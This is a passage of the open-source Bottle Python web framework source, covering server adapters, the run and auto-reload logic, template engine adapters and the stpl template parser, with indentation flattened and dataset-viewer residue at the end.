path += ('/<%s>' * argc) % tuple(spec[0][:argc])
yield path
for arg in spec[0][argc:]:
path += '/<%s>' % arg
yield path
def path_shift(script_name, path_info, shift=1):
''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.
:return: The modified paths.
:param script_name: The SCRIPT_NAME path.
:param script_name: The PATH_INFO path.
:param shift: The number of path fragments to shift. May be negative to
change the shift direction. (default: 1)
'''
if shift == 0: return script_name, path_info
pathlist = path_info.strip('/').split('/')
scriptlist = script_name.strip('/').split('/')
if pathlist and pathlist[0] == '': pathlist = []
if scriptlist and scriptlist[0] == '': scriptlist = []
if shift > 0 and shift <= len(pathlist):
moved = pathlist[:shift]
scriptlist = scriptlist + moved
pathlist = pathlist[shift:]
elif shift < 0 and shift >= -len(scriptlist):
moved = scriptlist[shift:]
pathlist = moved + pathlist
scriptlist = scriptlist[:shift]
else:
empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
raise AssertionError("Cannot shift. Nothing left from %s" % empty)
new_script_name = '/' + '/'.join(scriptlist)
new_path_info = '/' + '/'.join(pathlist)
if path_info.endswith('/') and pathlist: new_path_info += '/'
return new_script_name, new_path_info
def auth_basic(check, realm="private", text="Access denied"):
''' Callback decorator to require HTTP auth (basic).
TODO: Add route(check_auth=...) parameter. '''
def decorator(func):
def wrapper(*a, **ka):
user, password = request.auth or (None, None)
if user is None or not check(user, password):
err = HTTPError(401, text)
err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
return err
return func(*a, **ka)
return wrapper
return decorator
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
''' Return a callable that relays calls to the current default app. '''
@functools.wraps(getattr(Bottle, name))
def wrapper(*a, **ka):
return getattr(app(), name)(*a, **ka)
return wrapper
route = make_default_app_wrapper('route')
get = make_default_app_wrapper('get')
post = make_default_app_wrapper('post')
put = make_default_app_wrapper('put')
delete = make_default_app_wrapper('delete')
error = make_default_app_wrapper('error')
mount = make_default_app_wrapper('mount')
hook = make_default_app_wrapper('hook')
install = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url = make_default_app_wrapper('get_url')
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
quiet = False
def __init__(self, host='127.0.0.1', port=8080, **options):
self.options = options
self.host = host
self.port = int(port)
def run(self, handler): # pragma: no cover
pass
def __repr__(self):
args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()])
return "%s(%s)" % (self.__class__.__name__, args)
class CGIServer(ServerAdapter):
quiet = True
def run(self, handler): # pragma: no cover
from wsgiref.handlers import CGIHandler
def fixed_environ(environ, start_response):
environ.setdefault('PATH_INFO', '')
return handler(environ, start_response)
CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
def run(self, handler): # pragma: no cover
import flup.server.fcgi
self.options.setdefault('bindAddress', (self.host, self.port))
flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
def __init__(self, *args, **kargs):
super(WSGIRefServer, self).__init__(*args, **kargs)
self.server = None
def initialize(self, app):
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
self.server = make_server(self.host,
self.port,
app,
server_cls,
handler_cls)
self.port = self.server.server_port
def run(self, app): # pragma: no cover
if self.server is None:
self.initialize(app)
assert self.server is not None
self.server.serve_forever()
class CherryPyServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from cherrypy import wsgiserver
self.options['bind_addr'] = (self.host, self.port)
self.options['wsgi_app'] = handler
certfile = self.options.get('certfile')
if certfile:
del self.options['certfile']
keyfile = self.options.get('keyfile')
if keyfile:
del self.options['keyfile']
server = wsgiserver.CherryPyWSGIServer(**self.options)
if certfile:
server.ssl_certificate = certfile
if keyfile:
server.ssl_private_key = keyfile
try:
server.start()
finally:
server.stop()
class WaitressServer(ServerAdapter):
def run(self, handler):
from waitress import serve
serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from paste import httpserver
from paste.translogger import TransLogger
handler = TransLogger(handler, setup_console_handler=(not self.quiet))
httpserver.serve(handler, host=self.host, port=str(self.port),
**self.options)
class MeinheldServer(ServerAdapter):
def run(self, handler):
from meinheld import server
server.listen((self.host, self.port))
server.run(handler)
class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
def run(self, handler): # pragma: no cover
import fapws._evwsgi as evwsgi
from fapws import base, config
port = self.port
if float(config.SERVER_IDENT[-2:]) > 0.4:
# fapws3 silently changed its API in 0.5
port = str(port)
evwsgi.start(self.host, port)
# fapws3 never releases the GIL. Complain upstream. I tried. No luck.
if 'BOTTLE_CHILD' in os.environ and not self.quiet:
_stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
_stderr(" (Fapws3 breaks python thread support)\n")
evwsgi.set_base_module(base)
def app(environ, start_response):
environ['wsgi.multiprocess'] = False
return handler(environ, start_response)
evwsgi.wsgi_cb(('', app))
evwsgi.run()
class TornadoServer(ServerAdapter):
""" The super hyped asynchronous server by facebook. Untested. """
def run(self, handler): # pragma: no cover
import tornado.wsgi, tornado.httpserver, tornado.ioloop
container = tornado.wsgi.WSGIContainer(handler)
server = tornado.httpserver.HTTPServer(container)
server.listen(port=self.port,address=self.host)
tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
""" Adapter for Google App Engine. """
quiet = True
def run(self, handler):
from google.appengine.ext.webapp import util
# A main() function in the handler script enables 'App Caching'.
# Lets makes sure it is there. This _really_ improves performance.
module = sys.modules.get('__main__')
if module and not hasattr(module, 'main'):
module.main = lambda: util.run_wsgi_app(handler)
util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from twisted.web import server, wsgi
from twisted.python.threadpool import ThreadPool
from twisted.internet import reactor
thread_pool = ThreadPool()
thread_pool.start()
reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
reactor.listenTCP(self.port, factory, interface=self.host)
reactor.run()
class DieselServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from diesel.protocols.wsgi import WSGIApplication
app = WSGIApplication(handler, port=self.port)
app.run()
class GeventServer(ServerAdapter):
""" Untested. Options:
* `fast` (default: False) uses libevent's http server, but has some
issues: No streaming, no pipelining, no SSL.
* See gevent.wsgi.WSGIServer() documentation for more options.
"""
def run(self, handler):
from gevent import wsgi, pywsgi, local
if not isinstance(threading.local(), local.local):
msg = "Bottle requires gevent.monkey.patch_all() (before import)"
raise RuntimeError(msg)
if not self.options.pop('fast', None): wsgi = pywsgi
self.options['log'] = None if self.quiet else 'default'
address = (self.host, self.port)
server = wsgi.WSGIServer(address, handler, **self.options)
if 'BOTTLE_CHILD' in os.environ:
import signal
signal.signal(signal.SIGINT, lambda s, f: server.stop())
server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
def run(self,handler):
from socketio import server
address = (self.host, self.port)
server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
""" Untested. See http://gunicorn.org/configure.html for options. """
def run(self, handler):
from gunicorn.app.base import Application
config = {'bind': "%s:%d" % (self.host, int(self.port))}
config.update(self.options)
class GunicornApplication(Application):
def init(self, parser, opts, args):
return config
def load(self):
return handler
GunicornApplication().run()
class EventletServer(ServerAdapter):
""" Untested """
def run(self, handler):
from eventlet import wsgi, listen
try:
wsgi.server(listen((self.host, self.port)), handler,
log_output=(not self.quiet))
except TypeError:
# Fallback, if we have old version of eventlet
wsgi.server(listen((self.host, self.port)), handler)
class RocketServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from rocket import Rocket
server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
server.start()
class BjoernServer(ServerAdapter):
""" Fast server written in C: https://github.com/jonashaag/bjoern """
def run(self, handler):
from bjoern import run
run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
""" Untested. """
adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
def run(self, handler):
for sa in self.adapters:
try:
return sa(self.host, self.port, **self.options).run(handler)
except ImportError:
pass
server_names = {
'cgi': CGIServer,
'flup': FlupFCGIServer,
'wsgiref': WSGIRefServer,
'waitress': WaitressServer,
'cherrypy': CherryPyServer,
'paste': PasteServer,
'fapws3': FapwsServer,
'tornado': TornadoServer,
'gae': AppEngineServer,
'twisted': TwistedServer,
'diesel': DieselServer,
'meinheld': MeinheldServer,
'gunicorn': GunicornServer,
'eventlet': EventletServer,
'gevent': GeventServer,
'geventSocketIO':GeventSocketIOServer,
'rocket': RocketServer,
'bjoern' : BjoernServer,
'auto': AutoServer,
}
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
""" Import a module or fetch an object from a module.
* ``package.module`` returns `module` as a module object.
* ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
* ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.
The last form accepts not only function calls, but any type of
expression. Keyword arguments passed to this function are available as
local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``
"""
module, target = target.split(":", 1) if ':' in target else (target, None)
if module not in sys.modules: __import__(module)
if not target: return sys.modules[module]
if target.isalnum(): return getattr(sys.modules[module], target)
package_name = module.split('.')[0]
namespace[package_name] = sys.modules[package_name]
return eval('%s.%s' % (module, target), namespace)
def load_app(target):
""" Load a bottle application from a module and make sure that the import
does not affect the current default application, but returns a separate
application object. See :func:`load` for the target parameter. """
global NORUN; NORUN, nr_old = True, NORUN
try:
tmp = default_app.push() # Create a new "default application"
rv = load(target) # Import the target module
return rv if callable(rv) else tmp
finally:
default_app.remove(tmp) # Remove the temporary added default application
NORUN = nr_old
_debug = debug
def create_server(app=None, server='wsgiref',
host='127.0.0.1', port=8080,
plugins=None,
debug=None, **kargs):
if debug is not None: _debug(debug)
app = app or default_app()
if isinstance(app, basestring):
app = load_app(app)
if not callable(app):
raise ValueError("Application is not callable: %r" % app)
for plugin in plugins or []:
app.install(plugin)
if server in server_names:
server = server_names.get(server)
if isinstance(server, basestring):
server = load(server)
if isinstance(server, type):
server = server(host=host, port=port, **kargs)
if not isinstance(server, ServerAdapter):
raise ValueError("Unknown or unsupported server: %r" % server)
server.initialize(app)
return server
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
interval=1, reloader=False, quiet=False, plugins=None,
debug=None, **kargs):
""" Start a server instance. This method blocks until the server terminates.
:param app: WSGI application or target string supported by
:func:`load_app`. (default: :func:`default_app`)
:param server: Server adapter to use. See :data:`server_names` keys
for valid names or pass a :class:`ServerAdapter` subclass.
(default: `wsgiref`)
:param host: Server address to bind to. Pass ``0.0.0.0`` to listens on
all interfaces including the external one. (default: 127.0.0.1)
:param port: Server port to bind to. Values below 1024 require root
privileges. (default: 8080)
:param reloader: Start auto-reloading server? (default: False)
:param interval: Auto-reloader interval in seconds (default: 1)
:param quiet: Suppress output to stdout and stderr? (default: False)
:param options: Options passed to the server adapter.
"""
if NORUN: return
if reloader and not os.environ.get('BOTTLE_CHILD'):
try:
lockfile = None
fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
os.close(fd) # We only need this file to exist. We never write to it
while os.path.exists(lockfile):
args = [sys.executable] + sys.argv
environ = os.environ.copy()
environ['BOTTLE_CHILD'] = 'true'
environ['BOTTLE_LOCKFILE'] = lockfile
p = subprocess.Popen(args, env=environ)
while p.poll() is None: # Busy wait...
os.utime(lockfile, None) # I am alive!
time.sleep(interval)
if p.poll() != 3:
if os.path.exists(lockfile): os.unlink(lockfile)
sys.exit(p.poll())
except KeyboardInterrupt:
pass
finally:
if os.path.exists(lockfile):
os.unlink(lockfile)
return
try:
server = create_server(app, server,
host, port,
plugins, debug,
**kargs)
server.quiet = server.quiet or quiet
if not server.quiet:
_stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
_stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
_stderr("Hit Ctrl-C to quit.\n\n")
# Output to stderr can get stuck in the buffer. Flush stderr
# to ensure the above lines are written immediately.
sys.stderr.flush()
if reloader:
lockfile = os.environ.get('BOTTLE_LOCKFILE')
bgcheck = FileCheckerThread(lockfile, interval)
with bgcheck:
server.run(app)
if bgcheck.status == 'reload':
sys.exit(3)
else:
server.run(app)
except KeyboardInterrupt:
pass
except (SystemExit, MemoryError):
raise
except:
if not reloader: raise
if not getattr(server, 'quiet', quiet):
print_exc()
time.sleep(interval)
sys.exit(3)
class FileCheckerThread(threading.Thread):
''' Interrupt main-thread as soon as a changed module file is detected,
the lockfile gets deleted or gets to old. '''
def __init__(self, lockfile, interval):
threading.Thread.__init__(self)
self.lockfile, self.interval = lockfile, interval
#: Is one of 'reload', 'error' or 'exit'
self.status = None
def run(self):
exists = os.path.exists
mtime = lambda path: os.stat(path).st_mtime
files = dict()
for module in list(sys.modules.values()):
path = getattr(module, '__file__', '')
if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
if path and exists(path): files[path] = mtime(path)
while not self.status:
if not exists(self.lockfile)\
or mtime(self.lockfile) < time.time() - self.interval - 5:
self.status = 'error'
thread.interrupt_main()
for path, lmtime in list(files.items()):
if not exists(path) or mtime(path) > lmtime:
self.status = 'reload'
thread.interrupt_main()
break
time.sleep(self.interval)
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.status: self.status = 'exit' # silent exit
self.join()
return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
def __init__(self, message):
HTTPError.__init__(self, 500, message)
class BaseTemplate(object):
""" Base class and minimal API for template adapters """
extensions = ['tpl','html','thtml','stpl']
settings = {} #used in prepare()
defaults = {} #used in render()
def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
""" Create a new template.
If the source parameter (str or buffer) is missing, the name argument
is used to guess a template filename. Subclasses can assume that
self.source and/or self.filename are set. Both are strings.
The lookup, encoding and settings parameters are stored as instance
variables.
The lookup parameter stores a list containing directory paths.
The encoding parameter should be used to decode byte strings or files.
The settings parameter contains a dict for engine-specific settings.
"""
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = [os.path.abspath(x) for x in lookup]
self.encoding = encoding
self.settings = self.settings.copy() # Copy from class variable
self.settings.update(settings) # Apply
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=[]):
""" Search name in all directories specified in lookup.
First without, then with common extensions. Return first hit. """
if not lookup:
depr('The template lookup path list should not be empty.', True) #0.12
lookup = ['.']
if os.path.isabs(name) and os.path.isfile(name):
depr('Absolute template path names are deprecated.', True) #0.12
return os.path.abspath(name)
for spath in lookup:
spath = os.path.abspath(spath) + os.sep
fname = os.path.abspath(os.path.join(spath, name))
if not fname.startswith(spath): continue
if os.path.isfile(fname): return fname
for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
''' This reads or sets the global settings stored in class.settings. '''
if args:
cls.settings = cls.settings.copy() # Make settings local to class
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
""" Run preparations (parsing, caching, ...).
It should be possible to call this again to refresh a template or to
update settings.
"""
raise NotImplementedError
def render(self, *args, **kwargs):
""" Render the template with the specified local variables and return
a single byte or unicode string. If it is a byte string, the encoding
must match self.encoding. This method must be thread-safe!
Local variables may be provided in dictionaries (args)
or directly, as keywords (kwargs).
"""
raise NotImplementedError
class MakoTemplate(BaseTemplate):
def prepare(self, **options):
from mako.template import Template
from mako.lookup import TemplateLookup
options.update({'input_encoding':self.encoding})
options.setdefault('format_exceptions', bool(DEBUG))
lookup = TemplateLookup(directories=self.lookup, **options)
if self.source:
self.tpl = Template(self.source, lookup=lookup, **options)
else:
self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
class CheetahTemplate(BaseTemplate):
def prepare(self, **options):
from Cheetah.Template import Template
self.context = threading.local()
self.context.vars = {}
options['searchList'] = [self.context.vars]
if self.source:
self.tpl = Template(source=self.source, **options)
else:
self.tpl = Template(file=self.filename, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
self.context.vars.update(self.defaults)
self.context.vars.update(kwargs)
out = str(self.tpl)
self.context.vars.clear()
return out
class Jinja2Template(BaseTemplate):
def prepare(self, filters=None, tests=None, globals={}, **kwargs):
from jinja2 import Environment, FunctionLoader
self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
if filters: self.env.filters.update(filters)
if tests: self.env.tests.update(tests)
if globals: self.env.globals.update(globals)
if self.source:
self.tpl = self.env.from_string(self.source)
else:
self.tpl = self.env.get_template(self.filename)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
def loader(self, name):
fname = self.search(name, self.lookup)
if not fname: return
with open(fname, "rb") as f:
return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
self.cache = {}
enc = self.encoding
self._str = lambda x: touni(x, enc)
self._escape = lambda x: escape_func(touni(x, enc))
self.syntax = syntax
if noescape:
self._str, self._escape = self._escape, self._str
@cached_property
def co(self):
return compile(self.code, self.filename or '<string>', 'exec')
@cached_property
def code(self):
source = self.source or open(self.filename, 'rb').read()
try:
source, encoding = touni(source), 'utf8'
except UnicodeError:
depr('Template encodings other than utf8 are no longer supported.') #0.11
source, encoding = touni(source, 'latin1'), 'latin1'
parser = StplParser(source, encoding=encoding, syntax=self.syntax)
code = parser.translate()
self.encoding = parser.encoding
return code
def _rebase(self, _env, _name=None, **kwargs):
_env['_rebase'] = (_name, kwargs)
def _include(self, _env, _name=None, **kwargs):
env = _env.copy()
env.update(kwargs)
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(env['_stdout'], env)
def execute(self, _stdout, kwargs):
env = self.defaults.copy()
env.update(kwargs)
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'include': functools.partial(self._include, env),
'rebase': functools.partial(self._rebase, env), '_rebase': None,
'_str': self._str, '_escape': self._escape, 'get': env.get,
'setdefault': env.setdefault, 'defined': env.__contains__ })
eval(self.co, env)
if env.get('_rebase'):
subtpl, rargs = env.pop('_rebase')
rargs['base'] = ''.join(_stdout) #copy stdout
del _stdout[:] # clear stdout
return self._include(env, subtpl, **rargs)
return env
def render(self, *args, **kwargs):
""" Render the template using keyword arguments as local variables. """
env = {}; stdout = []
for dictarg in args: env.update(dictarg)
env.update(kwargs)
self.execute(stdout, env)
return ''.join(stdout)
class StplSyntaxError(TemplateError): pass
class StplParser(object):
''' Parser for stpl templates. '''
_re_cache = {} #: Cache for compiled re patterns
# This huge pile of voodoo magic splits python code into 8 different tokens.
# 1: All kinds of python strings (trust me, it works)
_re_tok = '((?m)[urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
'|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
'|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
'|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
_re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
# 2: Comments (until end of line, but not the newline itself)
_re_tok += '|(#.*)'
# 3,4: Keywords that start or continue a python block (only start of line)
_re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
'|^([ \\t]*(?:elif|else|except|finally)\\b)'
# 5: Our special 'end' keyword (but only if it stands alone)
_re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
# 6: A customizable end-of-code-block template token (only end of line)
_re_tok += '|(%(block_close)s[ \\t]*(?=$))'
# 7: And finally, a single newline. The 8th token is 'everything else'
_re_tok += '|(\\r?\\n)'
# Match the start tokens of code areas in a template
_re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))'
# Match inline statements (may contain python strings)
_re_inl = '%%(inline_start)s((?:%s|[^\'"\n]*?)+)%%(inline_end)s' % _re_inl
default_syntax = '<% %> % {{ }}'
def __init__(self, source, syntax=None, encoding='utf8'):
self.source, self.encoding = touni(source, encoding), encoding
self.set_syntax(syntax or self.default_syntax)
self.code_buffer, self.text_buffer = [], []
self.lineno, self.offset = 1, 0
self.indent, self.indent_mod = 0, 0
def get_syntax(self):
''' Tokens as a space separated string (default: <% %> % {{ }}) '''
return self._syntax
def set_syntax(self, syntax):
self._syntax = syntax
self._tokens = syntax.split()
if not syntax in self._re_cache:
names = 'block_start block_close line_start inline_start inline_end'
etokens = map(re.escape, self._tokens)
pattern_vars = dict(zip(names.split(), etokens))
patterns = (self._re_split, self._re_tok, self._re_inl)
patterns = [re.compile(p%pattern_vars) for p in patterns]
self._re_cache[syntax] = patterns
self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
syntax = property(get_syntax, set_syntax)
def translate(self):
if self.offset: raise RuntimeError('Parser is a one time instance.')
while True:
m = self.re_split.search(self.source[self.offset:])
if m:
text = self.source[self.offset:self.offset+m.start()]
self.text_buffer.append(text)
self.offset += m.end()
if m.group(1): # Escape syntax
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(m.group(2)+line+sep)
self.offset += len(line+sep)+1
continue
self.flush_text()
self.read_code(multiline=bool(m.group(4)))
else: break
self.text_buffer.append(self.source[self.offset:])
self.flush_text()
return ''.join(self.code_buffer)
def read_code(self, multiline):
code_line, comment, start_line = '', '', self.lineno
while True:
m = self.re_tok.search(self.source[self.offset:])
if not m:
code_line += self.source[self.offset:]
self.offset = len(self.source)
self.write_code(code_line.strip(), comment)
return
code_line += self.source[self.offset:self.offset+m.start()]
self.offset += m.end()
_str, _com, _blk1, _blk2, _end, _cend, _nl = m.groups()
if _str: # Python string
code_line += _str
elif _com: # Python comment (up to EOL)
comment = _com
if multiline and _com.strip().endswith(self._tokens[1]):
multiline = False # Allow end-of-block in comments
elif _blk1: # Start-block keyword (if/for/while/def/try/...)
code_line, self.indent_mod = _blk1, -1
self.indent += 1
elif _blk2: # Continue-block keyword (else/elif/except/...)
code_line, self.indent_mod = _blk2, -1
elif _end: # The non-standard 'end'-keyword (ends a block)
self.indent -= 1
elif _cend: # The end-code-block template token (usually '%>')
if multiline: multiline = False
else: code_line += _cend
else: # \n
self.write_code(code_line.strip(), comment)
self.lineno += 1
code_line, comment, self.indent_mod = '', '', 0
if not multiline:
break
def flush_text(self):
text = ''.join(self.text_buffer)
del self.text_buffer[:]
if not text: return
parts, pos, nl = [], 0, '\\\n'+' '*self.indent
for m in self.re_inl.finditer(text):
prefix, pos = text[pos:m.start()], m.end()
if prefix:
parts.append(nl.join(map(repr, prefix.splitlines(True))))
if prefix.endswith('\n'): parts[-1] += nl
parts.append(self.process_inline(m.group(1).strip()))
if pos < len(text):
prefix = text[pos:]
lines = prefix.splitlines(True)
if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
parts.append(nl.join(map(repr, lines)))
code = '_printlist((%s,))' % ', '.join(parts)
self.lineno += code.count('\n')+1
self.write_code(code)
def process_inline(self, chunk):
if chunk[0] == '!': return '_str(%s)' % chunk[1:]
return '_escape(%s)' % chunk
def write_code(self, line, comment=''):
code = ' ' * (self.indent+self.indent_mod)
code += line.lstrip() + comment + '\n'
self.code_buffer.append(code)
def template(*args, **kwargs):
'''
Get a rendered template as a string iterator.
You can use a name, a filename or a template string as first parameter.
Template rendering arguments can be passed as dictionaries
or directly (as keyword arguments).
'''
tpl = args[0] if args else None
adapter = kwargs.pop('template_adapter', SimpleTemplate)
lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
tplid = (id(lookup), tpl)
if tplid not in TEMPLATES or DEBUG:
settings = kwargs.pop('template_settings', {})
if isinstance(tpl, adapter):
TEMPLATES[tplid] = tpl
if settings: TEMPLATES[tplid].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tplid]:
abort(500, 'Template (%s) not found' % tpl)
for dictarg in args[1:]: kwargs.update(dictarg)
return TEMPLATES[tplid].render(kwargs)
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
''' Decorator: renders a template for a handler.
The handler can control its behavior like that:
- return a dict of template vars to fill out the template
- return something other than a dict and the view decorator will not
process the template, but return the handler result as is.
This includes returning a HTTPResponse(dict) to get,
for instance, JSON with autojson or other castfilters.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, (dict, DictMixin)):
tplvars = defaults.copy()
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return result
return wrapper
return decorator
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/']
TEMPLATES = {}
DEBUG = False
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, HTTP_CODES, request, touni
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
if __name__ == '__main__':
opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
if opt.version:
_stdout('Bottle %s\n'%__version__)
sys.exit(0)
if not args:
parser.print_help()
_stderr('\nError: No application specified.\n')
sys.exit(1)
sys.path.insert(0, '.')
sys.modules.setdefault('bottle', sys.modules['__main__'])
host, port = (opt.bind or 'localhost'), 8080
if ':' in host and host.rfind(']') < host.rfind(':'):
host, port = host.rsplit(':', 1)
host = host.strip('[]')
run(args[0], host=host, port=int(port), server=opt.server,
reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END
| 39.460022
| 103
| 0.592563
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.